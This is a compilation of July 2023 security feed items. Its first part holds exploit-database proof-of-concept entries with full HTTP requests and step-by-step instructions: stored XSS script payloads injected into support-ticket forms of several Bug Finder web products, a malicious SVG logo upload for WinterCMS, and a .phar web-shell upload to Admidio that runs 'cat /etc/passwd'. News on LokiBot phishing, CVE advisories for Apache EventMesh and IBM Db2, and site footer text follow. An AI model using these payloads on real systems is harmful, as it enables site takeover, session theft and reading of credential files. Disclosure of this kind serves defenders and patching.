MineStack version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: MineStack 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 14/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/minestack-a-cloud-mining-platform/10# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /mineStack/user/ticket/createPOST parameter 'message' is vulnerable to XSS-----------------------------------------------------------POST /mineStack/user/ticket/create HTTP/2Content-Disposition: form-data; name="subject"Anything-----------------------------20515916954165612239365932815Content-Disposition: form-data; name="message"<script>alert(1)</script>-----------------------------------------------------------## Steps to Reproduce:1. Login as a (Normal User)2. Go to [Support Ticket] on this Path: https://website/mineStack/user/ticket3. Click on [Create Ticket] on this Path: https://website/mineStack/user/ticket/create4. Enter Any Subject5. Inject your XSS Payload in [Message Box]6. Click on [Submit]7. When ADMIN visit [SUPPORT TICKETS] on this Path : https://website/mineStack/admin/tickets and Open the [New Pending Ticket]8. XSS Will Fire and Executed on his Browser[-] Done

MineStack 1.0 Cross Site Scripting

EX-RATE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: EX-RATE 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 14/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/ex-rate-a-complete-money-exchange-solution/14# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /ex-rate/user/ticket/createPOST parameter 'message' is vulnerable to XSS-----------------------------------------------------------POST /ex-rate/user/ticket/create HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="subject"Anything-----------------------------------------------------------Content-Disposition: form-data; name="message"<script>alert(1)</script>-----------------------------------------------------------## Steps to Reproduce:1. Login as a (Normal User)2. Go to [Support Ticket] on this Path: https://website/ex-rate/user/ticket3. Click on [Create Ticket] on this Path: https://website/ex-rate/user/ticket/create4. Enter Any Subject5. Inject your XSS Payload in [Message Box]6. Click on [Submit]7. When ADMIN visit [SUPPORT TICKETS] on this Path : https://website/ex-rate/admin/tickets and Open the [New Pending Ticket]8. XSS Will Fire and Executed on his Browser[-] Done

EX-RATE 1.0 Cross Site Scripting

WinterCMS versions prior to 1.2.3 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting# Exploit Author: abhishek morla# Google Dork: N/A# Date: 2023-07-10# Vendor Homepage: https://wintercms.com/# Software Link: https://github.com/wintercms/winter# Version: 1.2.2# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-37269# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3# Video POC : https://youtu.be/Dqhq8rdrcqcTitle : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload FunctionalityDescription :WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious scriptPayload:- // image.svg<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.cookie);   </script></svg>//Post RequestPOST /backend/system/settings/update/winter/backend/branding HTTP/1.1Host: 172.17.0.2User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cacheX-Requested-With: XMLHttpRequestX-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2X-WINTER-REQUEST-HANDLER: formLogo::onUploadContent-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206Content-Length: 608Origin: http://172.17.0.2Connection: closeCookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D-----------------------------186411693022341939203410401206Content-Disposition: form-data; name="file_data"; filename="image.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.domain);   </script></svg>-----------------------------186411693022341939203410401206--|-----------------------------------------EOF-----------------------------------------

WinterCMS 1.2.2 Cross Site Scripting

Montage version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Montage 1.0 Hotel Booking & Property Selling - Stored XSS# Exploit Author: CraCkEr# Date: 13/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/montage-a-complete-solution-for-hotel-booking-property-selling/16# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /montage/user/ticket/createPOST parameter 'message' is vulnerable to XSS-----------------------------------------------------------POST /montage/user/ticket/create HTTP/2Content-Disposition: form-data; name="subject"Anything-----------------------------------------------------------Content-Disposition: form-data; name="message"<script>alert(1)</script>-----------------------------------------------------------## Steps to Reproduce:1. Login as a (Normal User)2. in User [Dashboard] Click on [Support Ticket] on this Path: https://website/montage/user/ticket3. Click on [Create Ticket] on this Path: https://website/montage/user/ticket/create4. Enter Any Subject5. Inject your XSS Payload in [Message Box]6. Click on [Submit]8. When ADMIN visit [SUPPORT TICKETS] on this Path: https://website/montage/admin/tickets and Open the [New Pending Ticket]9. XSS Will Fire and Executed on his Browser[-] Done

Montage 1.0 Cross Site Scripting

Wedding Wonders version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wedding Wonders 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 13/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/wedding-wonders-a-matrimonial-and-matchmaking-platform/17# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /weeding-wonders/user/ticket/createPOST parameter 'message' is vulnerable to XSS-----------------------------------------------------------POST /weeding-wonders/user/ticket/create HTTP/2Content-Disposition: form-data; name="subject"Anything-----------------------------------------------------------Content-Disposition: form-data; name="message"<script>alert(1)</script>-----------------------------------------------------------## Steps to Reproduce:1. Login as a (Normal User)2. Go to [My Profile] on this Path: https://website/weeding-wonders/user/profile3. Click on [Support Ticket] on this Path: https://website/weeding-wonders/user/ticket4. Click on [Create Ticket]5. Enter Any Subject6. Inject your XSS Payload in [Message Box]7. Click on [Submit]8. When ADMIN visit [SUPPORT TICKETS] on this Path: https://website/weeding-wonders/admin/tickets and Open the [New Pending Ticket]9. XSS Will Fire and Executed on his Browser[-] Done

Wedding Wonders 1.0 Cross Site Scripting

Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems.
"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "It primarily targets Windows systems and aims to gather sensitive information from

Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.

"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "It primarily targets Windows systems and aims to gather sensitive information from infected machines."

The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution.

The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.

The injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.

An alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the "Auto\_Open" and "Document\_Open" functions.

The macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

LokiBot, not to be confused with an Android banking trojan of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.

"LokiBot is a long-standing and widespread malware active for many years," Lin said. "Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware

CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message and 

remote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, we will release the new version as soon as possible.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-26512

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 with a Federated configuration is vulnerable to a stack-based buffer overflow, caused by improper bounds checking.  A local user with SYSADM privileges could overflow the buffer and execute arbitrary code on the system.  IBM X-Force ID:  257763.

  

**Summary**

IBM® Db2® with Federated configuration is vulnerable to arbitrary code execution as Db2 instance owner.

**Vulnerability Details**

**CVEID:**   CVE-2023-35012  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) with a Federated configuration is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local user with SYSADM privileges could overflow the buffer and execute arbitrary code on the system.  
CVSS Base score: 6.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257763 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

11.5.7 with special build level before s2211170548.  The problem first fixed in s2211170548.

11.5.8 with special build level before s2211250928 .  The problem first fixed in s2211250928.

Server

All platforms are affected.  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V11.5.7 and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.5

TBD

DT215550

Special Build for V11.5.7:

AIX 64-bit  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 64-bit, x86

Special Build for V11.5.8:

AIX 64-bit  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

10 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"}\],"Version":"11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-35012: IBM® Db2® with Federated configuration is vulnerable to arbitrary code execution. (CVE-2023-35012)

Categories: News
Tags: week

Tags:  security

Tags:  July

Tags:  2023

A list of topics we covered in the week of July 10 to July 16 of 2023



(Read more...)




The post A week in security (July 10 - 16) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

Tag

#windows